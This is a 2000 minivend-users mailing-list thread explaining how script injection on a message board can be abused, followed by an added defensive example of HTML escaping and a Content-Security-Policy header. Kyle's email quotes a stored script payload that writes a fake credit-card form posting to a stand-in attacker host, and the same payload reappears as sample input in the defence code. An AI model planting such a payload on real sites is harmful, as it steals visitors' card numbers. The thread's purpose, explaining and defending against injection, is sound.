Re: [mv] RE: ..about time



******    message to minivend-users from Barry Treahy <treahy@mmaz.com>     ******

This may be a bit short-sighted on my part, but isn't this why we run encrypted sessions with
certificates provided by authenticated CA's?  To provide assurances to our customers that
they are connected to who they think they are?

Sure, mock pages for password stealing or CC # abduction are probably common across the net,
but I never put my card into a form that isn't encrypted...  Should this be SOP?

Barry Treahy

"kyle@invisio.com" wrote:

> ******    message to minivend-users from "kyle@invisio.com" <kyle@invisio.com>     ******
>
> It is not really about doing something malicious to a visitor's
> computer (like a virus), it is more like this:
>
> a web site takes form info from a visitor and displays it on a web
> page for others to see (like a message board) and someone enters
> the code below in the text box:
>
> <script language="JavaScript">
> <!--
>  document.write('<form action="https://evil.site.com/cgi/ripoff.pl" method="post">');
>  document.write('To purchase, please enter your credit card number below.<br>');
>  document.write('<input type="TEXT" name="cc" value="">');
>  document.write('<input type="SUBMIT" name="SUBMIT" value="SUBMIT">');
>  document.write('</form>');
> // -->
> </script>
>
> Obviously they could dress it up and make it look like an official form on
> that site if that site did not filter for such content.
>
> Then someone stumbles on this form on a site they trust and what do you know,
> but evil.site.com now has their cc number.
>
> This is just one example, just think of the possibilities!
>
> Kyle (KC)
>
> At 02:07 PM 2/3/00 -0600, you wrote:
> >******    message to minivend-users from "Nick Pleis" <npleis@cei.net>
> >******
> >
> >I'm a bit confused...How malicious can you really be with Javascript?
> >
> >I mean...sure you can change the appearance and whatnot, but can you do
> >any serious <<damage>> or is this more of a threat to just presentation?
> >
> >
> >>
> >> I am certainly not advocating closing down the web; that would make me
> >> have to go back and work for a living. 8-)
> >>
> >> --
> >> Mike Heins                          http://www.minivend.com/  ___
> >>                                     Internet Robotics        |_ _|____
> >> In character, in manners, in        131 Willow Lane, Floor 2  | ||  _ \
> >> style, in all things, the           Oxford, OH  45056         | || |_) |
> >> supreme excellence is               <mikeh@minivend.com>     |___|  _ <
> >> simplicity. -- Longfellow           513.523.7621 FAX 7501        |_| \_\
> >> -
> >> To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
> >> email with 'UNSUBSCRIBE minivend-users' in the body to
> >Majordomo@minivend.com.
> >> Archive of past messages: http://www.minivend.com/minivend/minivend-list
> >>


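The filtering Kyle's message says the site lacked, as an added example that is not part of the original thread and is not Minivend code: visitor text is HTML-escaped before it is written into the page, and a Content-Security-Policy header restricts where forms may post. The names `escapeHtml`, `renderPost` and `BOARD_CSP` are hypothetical, and the sample post is constructed from the submission quoted above.

```javascript
// Added example: escape visitor-supplied text before it is written into a page.
// escapeHtml, renderPost and BOARD_CSP are hypothetical names, not Minivend code.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every character that can open a tag, close an attribute or start an entity.
// A single pass over the input avoids double-escaping the '&' of an entity just written.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one message-board post. Author and body are both untrusted input.
function renderPost(post) {
  return (
    '<div class="post">' +
    '<p class="author">' + escapeHtml(post.author) + '</p>' +
    '<p class="body">' + escapeHtml(post.body).replace(/\r?\n/g, '<br>') + '</p>' +
    '</div>'
  );
}

// Second layer, sent as a response header: no inline script, and forms may only
// post back to this site. form-action is listed explicitly because default-src
// does not cover it.
const BOARD_CSP = "default-src 'self'; script-src 'self'; form-action 'self'";

// Constructed sample input, shortened from the submission quoted in the thread.
const samplePost = {
  author: 'visitor',
  body:
    '<script language="JavaScript">\n' +
    'document.write(\'<form action="https://evil.site.com/cgi/ripoff.pl" method="post">\');\n' +
    '</script>',
};

const rendered = renderPost(samplePost);
console.log(rendered);
console.log('Content-Security-Policy: ' + BOARD_CSP);
```

With the escaping in place the submission is displayed as literal text to other visitors instead of being interpreted as markup by their browsers.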
